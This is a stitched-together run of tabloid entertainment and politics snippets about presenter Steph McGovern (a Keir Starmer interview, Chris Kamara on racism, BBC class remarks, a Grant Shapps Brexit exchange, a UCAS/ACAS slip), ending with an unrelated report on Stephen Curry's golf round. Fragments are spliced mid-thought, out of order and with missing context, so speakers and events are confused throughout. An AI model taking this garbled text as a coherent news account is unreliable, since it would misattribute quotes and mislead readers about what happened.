However, talk quickly turned to homeschooling and how Starmer is coping in the third lockdown. As he revealed he tends to help his children with “easier” subjects, McGovern took the opportunity to tease the Labour leader about becoming Prime Minister but not being good at maths. “Keir, can I ask you, we were talking on the show earlier about homeschooling and you know there’s lots of parents struggling with all of that at the minute,” McGovern began. “I was keen to know, how is all of that going on at house? Vote in our poll Discussing the topical matter, Chris explained what racial abuse he experienced in Middlesbrough as a young black man. “When I first started playing football, ‘Love Thy Neighbour’ and ‘Alf Garnett’ were the programmes on the telly,” he began. “I would go into training the next day – and I like a laugh – so I would have a laugh about these programmes the same as anyone else. “But when you weren’t in the changing rooms, they should stop talking, the players, and then they’d go, ‘Oh you don’t mind, Kammy’. “And I couldn’t mind because I was the minority – I was one person. If you had two or three of you, you’d say, ‘You know, it’s fine and it’s a giggle but really and truly it hurts,’ he continued before recalling some of his other memories. Having grown up in the north herself, Steph was overcome with emotion when she heard about her co-star’s ordeal. READ MORE: Steph McGovern talks ‘hard’ time at home with partner ‘Blows my mind’ A third posted on the social media platform: “Well said Kammy,” with a fourth commenting: “We love you Kammy #NationalTreasure.” “What a great, natural response to such an important subject. hearing people’s real-life experiences of racism is just what we need to see, particularly during black history month,” a fifth opined. With Thursday, October 1, 2020, marking the beginning of Black History Month, all television networks will be showcasing the best of black talent. It was announced earlier this year Channel 4 bosses had made five commissions of special programming to celebrate the pivotal occasion. Among these include a documentary by comedian and The Masked Singer judge Mo Gilligan, 32, who will be celebrating the work of black comedians. Danny Horan, Head of Factual programming for the network said: “I am really excited about the range of programming for Black History Month this year, particularly because we are launching new onscreen talent we hope will become regular faces on Channel 4. “This is an important time to reflect, celebrate and consider again what has been achieved. “And how much more we, as a society and an industry, have to do redress the balance of storytelling, subjects and talent, both on and off-screen.” Steph’s Packed Lunch airs weekdays at 12:30pm on Channel 4. “Partly because of the virus and partly because he’s running out of friends,” the comedian continued. Clearly finding Angus’ new segment amusing, she noted: “I’ve been looking forward to you doing that.” The shut down didn’t come until the presenter had a general conversation with Angus, stating it must be a “great time” for stand-up comics to get material with so much happening in the news. Knowing the actor had travelled to Leeds especially to appear on the show, Steph asked: “How was your first night in Leeds?” Jokingly hitting back, he replied: “None of your business,” with his dry humour once again leaving her in tears of laughter. Ms McGovern became a famous face for the BBC. Having daily spots on its flagship breakfast show, the broadcaster was able to increase her public profile through the corporation. She slowly rose through the ranks, becoming the main businesses presenter for Breakfast. Often, Ms McGovern would host the entire show. Her rise to the top was a remarkable story, given she started as an intern on the Tomorrow’s World programme before securing part-time work as a current affairs researcher. Many serenaded Ms McGovern with messages of congratulation after she announced she and her girlfriend were expecting their first child. She eventually gave birth to a baby girl in November 2019. She was, however, an outspoken critic of the BBC’s gender pay gap row, in which the corporation’s data revealed men earned disproportionately more for the same jobs. Shortly after receiving a salary boost in the aftermath of the row which saw her pay-packet increase to a six-figure salary, Ms McGovern again spoke out about her pay, or what she saw as a lack thereof. She complained to The Sunday Times that her fellow “posh” broadcasters earned more than her. JUST IN: Charlie Stayt hounds MP Simon Clarke over two-metre rule “But what the BBC doesn’t do enough of is thinking about getting people from more working-class backgrounds. “It’s just posh.” The Middlesbrough-born presenter said “a lot of people in management are from the same background”. “We’re talking about: ‘How do we represent more working class people?’ when they themselves are not working class. “So how do they know?” She went on to tell of an encounter with a manager who told her she was “too common” to be a BBC presenter. Ms McGovern, seeing the media storm she had caused by doing the interview, quickly made an attempt to clarify what she meant. The day after the piece was published, she posted a tweet that read: “I was asked to do an interview with the education editor at the Sunday Times about my work with Young Enterprise; a charity helping young people learn about business which I have been heavily involved with for many years. “Towards the end of the interview I was asked about BBC pay and culture. I said I thought that the issue wasn’t just about gender, but also about class. “I also said that we talk a lot in the BBC about how to be better at ethnic diversity, which is important because we’re not good enough at it. However we never talk about class and I suggested that if we did it would make us more diverse in lots of ways, including ethnicity. “I am in a very fortunate position; I love my job and never dreamed I would have such an amazing career and salary. I grew up in Middlesbrough, a town that is often portrayed in a negative light, but one I love. “I want the people I grew up with and everyone from a place deemed as ‘poor’ to know that they should never be held back from achieving the best in life and they should be proud of where they’re from. That’s it.” Ms McGovern left the BBC in October 2019 and now presents ‘The Steph Show’ on Channel 4’. However, due to the current coronavirus outbreak, the decision was made to bring the launch date forward to last month and she would host the programme live from her home. The first episode on March 30 debuted with 234,000 viewers tuning in and five members of production on hand to bring the show to air for an hour each weekday. Speaking of letting cameras into her home, Steph said: “I’m a private person, so to fling open my doors to the nation is daunting. “But these are very strange times, so we’re all doing stuff out of our comfort zone.” The Steph Show airs weekdays at 12pm on Channel 4. Steph caught up with the Jackson family which includes three-year-old Lilac who suffers from Spastic Diplegia Cerebral Palsy. Some viewers were aware of Lilac’s story as her family have been fundraising to help Lilac achieve her dream of walking independently. One viewer said: “Yay go Lilac watched it on catchup she’s literally a little ray of sunshine.” “I love seeing Lilac’s progress every day, she is such an inspiration and works hard and always has a beautiful smile on her face @LegsLilacs,” another added. A third wrote: “Lilac is such a charmer. Watching her achieve all these fabulous milestones (all the way over in Australia) is heartwarming. She always makes my day.” The Steph Show airs weekdays on Channel 4 at 12pm. It’s not the only time Steph’s broadcasted to fans from her home this week as her new Channel 4 venture has seen her come live to viewers in lockdown every day. She’s been presenting The Steph Show each weekday featuring a host of different celebrity guests, in a bid to help those at home survive the boredom of social distancing. Coming live from her front room, she told viewers earlier this week: “This is my actual house where, for a long time, I’ve just been living here, in a lot of chaos because of the baby and now we’re doing a show from here.” “Like a lot of people I’m now working from home, and these are strange times so I wanted to create a show from my front room that’s a power hour of positivity where we celebrate the brilliant people out there.” Have I Got News for You continues on Friday at 9pm on BBC One. BBC host Steph McGovern clashed in a heated debate with Conservative Transport Secretary Grant Shapps in an explosive Brexit row. The presenter pressed the Tory MP for Welwyn Hatfield over the “backlash” the Prime Minister has seen since announcing he will prorogue Parliament ahead of the Queen’s Speech on October 14, which will effectively limit the time MPs have to try to block a no deal Brexit. Mr Shapps quickly hit back at MPs “getting excited” over the announcement from the Prime Minister earlier this week. The BBC host said: “Mr Shapps there has been a huge backlash to this. You are painting a picture that this is very normal. But, there has been a huge backlash and amongst some of your MPs as well. “This is at a time when we need to get agreement between people, not division, isn’t it?” The Tory MP quickly replied: “I tell you what isn’t normal, it is not normal to think it’s okay not to have legislation to pass. You can’t have legislation to pass unless you have a new Queen’s Speech. “What’s not normal is we haven’t had a new Queen’s Speech and this is correcting that with a Government that has got a very busy domestic agenda to do with 20,000 more police to clamp down on serious crime. “Putting more money into the NHS, making sure we level up school spending, so all the pupils are getting the right amount of money. READ MORE: Blackford dismantled by John Humphrys as he brands Boris ‘dictator’ “So, there is a big domestic agenda. Which you cannot do unless you are able to set that out in a Queen’s Speech. “It is perfectly normal, I know people are getting extremely excited about it. But, actually, those four days in October, to get ready for the new Queen’s Speech, seems perfectly rational to me.” He added: “And then there is plenty of time around that European Summit, both before and after to debate whatever new has, I hope, come out from this stepped-up effort by the EU and our diplomats to try to find a negotiated settlement. “But, all of that against the backdrop of the announcement I am actually making today and to speak about which is preparing the ports readiness and the infrastructure readiness.” The Prime Minister refused to accept that he was limiting MPs time to debate Brexit as a result of the decision to suspend Parliament ahead of the Queen’s Speech on October 14. Mr Johnson said: “There will be ample time on both sides of that crucial October 17 Summit in Parliament for MPs to debate the EU, Brexit and all the other issues.” The move from the Government came after opposition parties met at the start of this week and said they would do everything in their power to try to block a no deal exit from the Brussels bloc. Campaigners against a no deal Brexit accused the Prime Minister of “trashing the constitution” after the Government’s plans to prorogue Parliament in the lead-up to the October 31 Brexit deadline. Defending the decision on Thursday morning, Leader of the House, Jacob Rees-Mogg said: “I think the outrage is phoney and it is created by people who don’t want us to leave the European Union and are trying very hard to overturn the referendum result and don’t want the benefits of leaving the European Union.” He added: “Parliament wasn’t going to be sitting for most of this time anyway. This is completely constitutional and proper.” DON’T MISS: Speaking on Sky News, shadow chancellor John McDonnell outlined the next steps for Labour. He said: “The position we are in at the moment is looking at a legislative intervention next week. “We will focus on that, and what we will do and Jeremy Corbyn brought all the opposition leaders together, it was an incredibly productive and positive meeting and we have all agreed on the strategy we are pursuing and that is what we will hold to.” Former Conservative frontbencher David Gauke warned next week will be the last chance for MPs to maintain “some control” over the Brexit process before a potential no deal exit. He said: “It does look like next week is essentially the only opportunity that Parliament will have to maintain some control over this process and ensure that it has a say before we leave without a deal.” Tory rebel and former minister Sir Oliver Letwin, a leading opponent of a no deal Brexit, said he had been speaking to Commons Speaker John Bercow to establish “what the procedures are”. He told BBC Radio 4’s Today programme: “There is no question of any MP cooking up a deal with the Speaker – you can’t do that, the Speaker has to follow the rules. “It’s perfectly true that I, for many months, have been talking to the clerks and to the Speaker, and that’s the appropriate thing for MPs to do if they want to establish what the procedures are. The action here is on the part of MPs, not on the part of the Speaker.” He added: “I, of course, would like to see the prorogation not happen because I don’t think the prorogation is a proper proceeding. But, whether it is lawful or not, we will find out in the courts. That’s not for MPs to decide. “What I have been concerned with and will continue to be concerned with is the question of how, in the remaining time if we are prorogued, we can ensure that Britain doesn’t make a sudden, disorderly, undemocratic no-deal exit on October 31.” Shadow attorney-general Baroness Chakrabarti said she believed opponents of Boris Johnson had the numbers in Parliament to force through a change in the law to block a no deal. Steph McGovern and Charlie Stayt presented BBC Breakfast earlier today and the main topic at hand was the country’s teenagers receiving their A-level results. As most nervously wait to find out whether they will be going to university or not, the Teesside-born journalist looked at ways those who didn’t quite get the results they needed. Those who need further advice are urged to visit UCAS where they can also see places available through clearing and the like. But it seems Steph got her acronyms mixed up as she delivered the crucial information. UCAS – the Universities and Colleges Admissions Service – was accidentally confused by ACAS – the Advisory, Conciliation and Arbitration Service – by Steph. And viewers didn’t let the blunder slip, as they flocked to Twitter to comment on Steph’s gaffe. One shared: “Uni clearing system is UCAS, not ACAS, Steph – unless they want conciliation & arbitration.” A second added: “#bbcbreakfast did Steph just call UCAS ACAS?! #UCCA #ACAS.” It was only a one-off however, as Steph made sure she got it right the next following times. The blunder perhaps comes from Steph’s business journalism background. Earlier in the week, Sally Nugent walked off BBC Breakfast earlier in the week. The sports presenter shared some jokes with Dan Walker and Louise Minchin, about the team’s new mugs. Louise noticed Sally didn’t have one, laughing about her white cup with “BBC Breakfast” written crudely on it. Dan defended his sports colleague, telling her the effort was “beautiful”. Louise admitted her officially-branded mug wasn’t for keeping, adding: “Can we just be clear, this [mug] is only on loan to me, it’s shared.” But things turned a little sour after Sally wrapped up her sports report and said: “I’m going to take my mug and go.” Dan added: “Take your cheap mug and get off.” Acting unimpressed, Sally stood up after saying, “Okay,” and walked off set. Acting shocked, Louise jumped in: “Oh she’s gone, she’s gone!” BBC Breakfast airs weekdays on BBC on 6am.

Making his second appearance in the $ 600,000 event at TPC Stonebrae, the Golden State Warriors star rebounded from a bogey on the second hole with a birdie on the par-5 third . He added birdies on the par-4 seventh and eighth – hitting the flagstick on No. 8 – and closed with a par on No. 9.
Playing as an amateur, Curry was eight shots behind leaders Adam Long and Seth Reeves with the afternoon wave still on the course. Last year, Curry shot 74-74 to tie for 148th and miss the cut by 11 shots.

Playing alongside Web.com Tour winners Martin Trainer and Cameron Champ in the round that began on No. 10, Curry slightly pulled his iron off the tee into the first cut of rough, up against a sprinkler head.
“I can’t play this hole without getting a ruling,” he joked, referencing the opening tee shot last year that wound up in a drink cup inside a cart left of the hole.
He made par and also parred the next two before stumbling with bogeys on Nos. 13, 15 and 16.
“This time, it took me until hole No. 8 or 9 to really just get comfortable, especially on the greens,” Curry said.
“Again, you can’t simulate that pressure standing over 10-foot putts, 5-foot putts, knowing they count, and how many of them for me were for pars early. That was a hard part to adjust to, but once you get in a groove, good things happen.”
Curry made his fourth bogey at the par-3 second, then two-putted for birdie on the third. He celebrated with a lighthearted hug with caddie Jonnie West, a Warriors employee and TPC Stonebrae member.
“It took me six holes last year to get my first one and it took me 12 holes this year,” Curry said. “I had to wait a little bit. It was a nice relief to see a putt go in.” He made a 10-foot birdie putt on the seventh, then hit a 9-iron from 148 yards on the eighth that ricocheted off the pin and settled 5 feet short of the hole to set up a birdie.
“Yeah, there’s one of those off the face, hit it flush and it was on line,” Curry said. “I see it hit – or I hear the pin rattle – and that was a cool moment. I didn’t know how close it landed. When I walked up there, literally was an inch away from dunking it. Out here I don’t get many dunks.” He three-putted for par on the par-5 ninth.
“It was fun to be able to hit some decent shots early, and from there turn it into actual scoring, which was good,” Curry said.
Trainer shot 69, and Champ had a 68.
“It was impressive,” said Trainer, a two-time winner this year. “His game as a whole was really impressive. It really surprised me. Obviously, he’s not as sharp because I don’t think he plays as much as we do.” Champ won the Utah Championship last month and leads the tour in driving distance.
“It was definitely a good experience,” Champ said. “Obviously, all the fans shouting his name and whatnot. It was good just to see his game, too. I was very impressed.
